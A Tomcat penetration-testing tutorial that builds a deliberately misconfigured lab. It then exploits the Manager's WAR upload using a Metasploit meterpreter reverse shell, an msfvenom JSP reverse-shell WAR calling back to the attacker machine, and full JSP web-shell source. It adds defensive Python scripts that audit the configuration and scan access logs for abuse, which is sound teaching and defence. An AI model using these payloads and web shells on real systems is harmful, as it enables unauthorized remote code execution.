Tomcat Penetration Testing
Contents
Introduction
Lab Setup
Configuration
Enumeration
Exploitation using Metasploit Framework
Exploiting Manually (Reverse Shell)
Conclusion
Introduction
Tomcat Penetration Testing is essential for identifying vulnerabilities in Apache Tomcat, a widely
used web server and servlet container. Originally, the Apache Software Foundation developed
Tomcat to serve as a demonstration platform for Java Servlet and JavaServer Pages (JSP)
technologies, which power Java web applications. Over time, Tomcat expanded its capabilities to
support additional Java web technologies.
Moreover, a notable feature of Tomcat is its support for deploying web applications using WAR (Web
Application Archive) files. These files bundle together all the components of a web application,
including code, pages, and files, making deployment simpler. As a result, Tomcat allows users to
upload and run these WAR files, enabling them to host their applications on the internet.
In addition to WAR files, Tomcat also supports the deployment of JSP pages. JSP is a technology that
enables developers to create dynamic web pages using Java. Therefore, Tomcat can execute these
JSP pages, making it a versatile platform for hosting a wide range of web applications.
By default, Tomcat supports the use of WAR files and JSP pages. However, administrators can
configure settings to ensure security and control over file uploads, thereby enhancing the overall
safety of the server.
Lab Setup
In this article, we are going to set up the Tomcat server on an Ubuntu machine and exploit the file
upload functionality of the Tomcat Manager. The machines used are:
Target Machine: Ubuntu (192.168.1.5)
Attacker Machine: Kali Linux (192.168.1.7)
Installation
Apache Tomcat relies on Java, meaning you'll need to have the Java JDK installed on your server. You
can install it by running the command below:
apt install openjdk-11-jdk
Add a new user by the name tomcat using the following command:
useradd -m -U -d /opt/tomcat -s /bin/false tomcat
Next, download the Tomcat tar.gz file from the official website.
Download the release archive onto the Ubuntu machine and extract it. The version in the download
URL must match the archive name used in the following commands (10.1.20 here):
wget https://archive.apache.org/dist/tomcat/tomcat-10/v10.1.20/bin/apache-tomcat-10.1.20.tar.gz
tar -xvf apache-tomcat-10.1.20.tar.gz
Move the extracted files into the /opt/tomcat directory, give ownership to the tomcat user and set
the execute permission on the startup scripts.
mv apache-tomcat-10.1.20/* /opt/tomcat
chown -R tomcat: /opt/tomcat
sh -c 'chmod +x /opt/tomcat/bin/*.sh'
Create a tomcat.service file in the /etc/systemd/system/ directory and add the following content to
the file:
[Unit]
Description=Apache Tomcat
After=network.target

[Service]
Type=forking
User=tomcat
Group=tomcat
Environment=JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
Environment=CATALINA_PID=/opt/tomcat/tomcat.pid
Environment=CATALINA_HOME=/opt/tomcat
Environment=CATALINA_BASE=/opt/tomcat
Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"
ExecStart=/opt/tomcat/bin/startup.sh
ExecStop=/opt/tomcat/bin/shutdown.sh
ExecReload=/bin/kill $MAINPID
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target
Reload the systemd daemon to apply the changes using the following command:
systemctl daemon-reload
Also, enable the tomcat service so that it starts at boot, and start it now:
systemctl enable --now tomcat
Check the status of the tomcat service:
systemctl status tomcat
Configuration
After the installation is complete, it is time to configure the Tomcat server.
To create an admin user and password, edit the following file:
nano /opt/tomcat/conf/tomcat-users.xml
Add the following lines above the closing </tomcat-users> tag:
<role rolename="admin-gui"/>
<role rolename="manager-gui"/>
<user username="admin" password="password" roles="admin-gui,manager-gui"/>
To enable remote access to the Tomcat Manager, make the following changes in the context.xml file
present in both the manager and host-manager directories.
nano /opt/tomcat/webapps/manager/META-INF/context.xml
nano /opt/tomcat/webapps/host-manager/META-INF/context.xml
Remove the following line from both the above files as shown below:
Once the changes are made, restart the tomcat service on Ubuntu.
systemctl restart tomcat
Observe that the Tomcat server is now up and running on port 8080 on the Ubuntu machine.
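The two changes made in this section, a manager account with a default password in tomcat-users.xml and the RemoteAddrValve removed from manager/META-INF/context.xml, are exactly what makes the Manager App exploitable in the rest of this article. The following Python script is an added example, not part of the original article: it audits tomcat-users.xml for privileged accounts with default passwords and re-implements the valve's address check so you can see which clients each version of context.xml admits. The XML samples are constructed; the loopback-only allow pattern is the one Tomcat ships in the manager's context.xml, and the admin workstation address 192.168.1.10 in the hardened variant is an assumption.

```python
"""Audit the Tomcat settings that turn the Manager App into a file-upload RCE path.

Added example, not code from the original article. It checks:
  1. tomcat-users.xml: accounts holding manager/admin roles and whether their
     password is a well-known default.
  2. manager/META-INF/context.xml: whether the RemoteAddrValve is still present
     and which client addresses it admits.
All sample XML below is constructed for the demo.
"""
import re
import xml.etree.ElementTree as ET

MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}
DEFAULT_PASSWORDS = {"password", "tomcat", "admin", "manager", "s3cret", "changeit"}
REMOTE_ADDR_VALVE = "org.apache.catalina.valves.RemoteAddrValve"

# tomcat-users.xml as this article configures it (constructed sample).
WEAK_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-gui"/>
  <user username="admin" password="password" roles="admin-gui,manager-gui"/>
  <user username="monitor" password="Kq7!v9pLz2mX" roles="manager-status"/>
</tomcat-users>
"""

# manager/META-INF/context.xml as Tomcat ships it: the valve admits loopback only.
SHIPPED_CONTEXT_XML = r"""<Context antiResourceLocking="false" privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1" />
</Context>
"""

# The same file after the valve line is removed, as the lab above does.
OPENED_CONTEXT_XML = """<Context antiResourceLocking="false" privileged="true">
</Context>
"""

# Safer way to allow remote administration: keep the valve and add only the
# admin workstation (assumed address) to the allow list.
HARDENED_CONTEXT_XML = r"""<Context antiResourceLocking="false" privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1|192\.168\.1\.10" />
</Context>
"""


def _local(tag):
    """Strip the XML namespace that tomcat-users.xml declares."""
    return tag.rsplit("}", 1)[-1]


def audit_users(xml_text):
    """Return one finding dict per <user> that holds a manager or admin role."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = roles & MANAGER_ROLES
        if not privileged:
            continue
        pwd = el.get("password")
        findings.append({
            "username": el.get("username"),
            "roles": sorted(privileged),
            # A missing password attribute is treated as weak as a default one.
            "default_password": pwd is None or pwd.lower() in DEFAULT_PASSWORDS,
        })
    return findings


def remote_addr_allow(context_xml):
    """Return the RemoteAddrValve allow pattern, or None when the valve is absent."""
    for valve in ET.fromstring(context_xml).iter("Valve"):
        if valve.get("className") == REMOTE_ADDR_VALVE:
            return valve.get("allow", "")
    return None


def manager_reachable_from(context_xml, client_ip):
    """Mirror the valve's decision: with no valve every client is admitted;
    otherwise the client address must match the allow regex in full (Tomcat
    uses Matcher.matches()). The optional deny attribute is not modelled here."""
    allow = remote_addr_allow(context_xml)
    if allow is None:
        return True
    return re.fullmatch(allow, client_ip) is not None


if __name__ == "__main__":
    for f in audit_users(WEAK_USERS_XML):
        flag = "DEFAULT PASSWORD" if f["default_password"] else "ok"
        print(f"{f['username']:<10} {','.join(f['roles']):<24} {flag}")
    for name, ctx in [("shipped", SHIPPED_CONTEXT_XML), ("opened", OPENED_CONTEXT_XML),
                      ("hardened", HARDENED_CONTEXT_XML)]:
        print(f"{name:<9} attacker 192.168.1.7 admitted: {manager_reachable_from(ctx, '192.168.1.7')}"
              f"  admin 192.168.1.10 admitted: {manager_reachable_from(ctx, '192.168.1.10')}")
```

Run against a real install by reading the two files under /opt/tomcat/conf and /opt/tomcat/webapps/manager/META-INF instead of the constructed strings. The point of the hardened variant is that remote administration does not require deleting the valve: extending its allow list keeps the Manager App unreachable from every other host, which is what defeats both the Metasploit module and the manual upload shown later in this article.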
Enumeration
After the installation and configuration are complete, the enumeration phase begins.
Using Kali Linux as the attacker machine, initial enumeration can be performed with nmap:
nmap -p 8080 -sV 192.168.1.5
Exploitation using Metasploit Framework
First, the upload functionality is exploited with Metasploit, as an exploit module is already available
for the Tomcat Manager file upload. The module used here is exploit/multi/http/tomcat_mgr_upload.
Inside Metasploit, type the following commands to run the exploit:
use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.1.5
set rport 8080
set httpusername admin
set httppassword password
show targets
set target 2
set payload linux/x86/meterpreter_reverse_tcp
exploit
As shown above, a reverse shell is obtained and commands can be executed through the meterpreter
session.
Exploiting Manually (Reverse Shell)
Additionally, attackers can also perform the above exploitation process manually. To do that, they
first need to create a .war file using msfvenom.
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.1.7 lport=1234 -f war > shell.war
Next, after generating the shell.war file, attackers must upload it to the Tomcat Manager App.
To access the Manager App, users must provide basic authentication. Typically, the username is
admin and the password is password to gain access to the Tomcat Manager App.
Once logged in, they can upload the previously created shell.war file using the WAR file deployment
functionality.
Once the file is uploaded, it can be seen in the list of deployed applications.
Before accessing the uploaded file, start a netcat listener on port 1234.
rlwrap nc -lvnp 1234
Click on the /shell to access the file to obtain a reverse shell.
The reverse shell is obtained at port 1234.
Exploiting Manually (Web Shell)
To get a web shell, attackers can use a .war file that contains .jsp files. Once the .war file is uploaded
to the server, it provides access to the web shell.
In order to create a .war file containing .jsp files, Java must be installed on the Kali Linux machine.
apt install openjdk-11-jdk
Now create a webshell directory and place the index.jsp file inside it.
mkdir webshell
cd webshell
nano index.jsp
Copy the following code into the index.jsp file for the web shell.
<FORM METHOD=GET ACTION='index.jsp'>
  <INPUT name='cmd' type=text>
  <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  String output = "";
  if(cmd != null) {
    String s = null;
    try {
      Process p = Runtime.getRuntime().exec(cmd,null,null);
      BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
      while((s = sI.readLine()) != null) { output += s+"</br>"; }
    } catch(IOException e) { e.printStackTrace(); }
  }
%>
<pre><%=output %></pre>
After the index.jsp file is created, package the directory into a .war file:
jar -cvf ../webshell.war *
After the webshell.war file is created, upload it through the deploy functionality.
The index.jsp page can be accessed within the deployed webshell context and a web shell is
obtained.
An alternative way to do the above manual exploitation is to download a ready-made cmd.jsp file and
create the .war file using zip.
The web shell JSP file can be downloaded from here:
https://github.com/tennc/webshell/tree/master/fuzzdb-webshell/jsp
Next, after the cmd.jsp file is downloaded, a revshell.war file can be created using the following
command:
zip -r revshell.war cmd.jsp
Again, repeat the same procedure as discussed earlier and upload the revshell.war file through the
deploy functionality. The web shell is obtained by accessing the file at the path:
http://192.168.1.5:8080/revshell/cmd.jsp
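Every variant shown above (the Metasploit tomcat_mgr_upload module, the msfvenom WAR, and the index.jsp and cmd.jsp web shells) leaves the same sequence in Tomcat's access log: authentication attempts against /manager, a deploy request, and then a first request to a context path that did not exist before. The following Python script is an added example, not part of the original article, that runs those checks over constructed log lines in the default AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b); the timestamps, client addresses, byte counts and the CSRF nonce value are made up for the demo.

```python
"""Spot Tomcat Manager WAR-deployment abuse in Tomcat access logs.

Added example, not part of the original article. SAMPLE_LOG is constructed in
Tomcat's default AccessLogValve "common" pattern to mirror the article's steps:
repeated manager logins, a WAR upload through the manager, then the first
request to the freshly deployed context.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that deploy a WAR: the HTML upload form used in the article
# and the text/script interface used by automation such as Metasploit's module.
DEPLOY_ENDPOINTS = {
    ("POST", "/manager/html/upload"),
    ("PUT", "/manager/text/deploy"),
    ("GET", "/manager/text/deploy"),
    ("POST", "/manager/html/deploy"),
}
DEPLOY_WINDOW = timedelta(minutes=5)   # a new context this soon after a deploy is suspicious
AUTH_FAILURE_THRESHOLD = 3             # 401s on /manager from one client before alerting

SAMPLE_LOG = """
10.0.0.5 - - [12/Mar/2024:10:12:00 +0000] "GET /docs/ HTTP/1.1" 200 19422
192.168.1.7 - - [12/Mar/2024:10:14:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.1.7 - - [12/Mar/2024:10:14:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.1.7 - - [12/Mar/2024:10:14:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.1.7 - admin [12/Mar/2024:10:14:05 +0000] "GET /manager/html HTTP/1.1" 200 14811
192.168.1.7 - admin [12/Mar/2024:10:14:31 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 303 -
192.168.1.7 - - [12/Mar/2024:10:14:40 +0000] "GET /shell/ HTTP/1.1" 200 -
192.168.1.22 - - [12/Mar/2024:10:15:12 +0000] "GET /webshell/index.jsp?cmd=id HTTP/1.1" 200 311
10.0.0.5 - - [12/Mar/2024:10:16:00 +0000] "GET /docs/ HTTP/1.1" 200 19422
""".strip().splitlines()


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not fit."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)
    rec["context"] = "/" + url.path.split("/")[1]   # first path segment = web app context
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect(lines):
    """Return alerts as (rule, line_no, client, detail) tuples."""
    alerts = []
    baseline = set()   # contexts requested before any deploy was seen
    deploys = []       # timestamps of successful deploy requests
    failures = {}      # client -> count of 401 responses on /manager
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        client, path, q = rec["client"], rec["path"], rec["query"]

        if path.startswith("/manager") and rec["status"] == 401:
            failures[client] = failures.get(client, 0) + 1
            if failures[client] == AUTH_FAILURE_THRESHOLD:
                alerts.append(("manager-auth-failures", n, client,
                               f"{AUTH_FAILURE_THRESHOLD} failed logins to {path}"))

        if (rec["method"], path) in DEPLOY_ENDPOINTS and rec["status"] < 400:
            deploys.append(rec["ts"])
            target = q.get("path", ["(taken from the WAR file name)"])[0]
            alerts.append(("manager-war-deploy", n, client,
                           f"{rec['method']} {path} by user {rec['user']}, context {target}"))
            continue

        if "cmd" in q:   # parameter name used by both web shells in the article
            alerts.append(("command-parameter", n, client, f"{path}?cmd={q['cmd'][0]}"))

        ctx = rec["context"]
        if not deploys:
            baseline.add(ctx)
        elif ctx not in baseline and ctx != "/manager":
            age = rec["ts"] - deploys[-1]
            if timedelta(0) <= age <= DEPLOY_WINDOW:
                alerts.append(("new-context-after-deploy", n, client,
                               f"first request to {ctx} {int(age.total_seconds())}s after a deploy"))
            baseline.add(ctx)
    return alerts


if __name__ == "__main__":
    for rule, n, client, detail in detect(SAMPLE_LOG):
        print(f"line {n:>3}  {client:<14} {rule:<26} {detail}")
```

Point it at /opt/tomcat/logs/localhost_access_log.*.txt on the target to run it against real traffic. The deploy itself is the high-confidence signal; the "new context shortly after deploy" and cmd= rules are there to tie the upload to its first use, which is the moment the msfvenom payload or the JSP shell actually executes.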
Conclusion
In essence, Apache Tomcat remains a preferred choice for deploying Java web applications, offering
a blend of versatility and security that caters to the diverse needs of developers and administrators
alike. Nevertheless, due to misconfigurations, attackers can abuse it to perform unintended actions
such as Remote Code Execution.
www.ignitetechnologies.in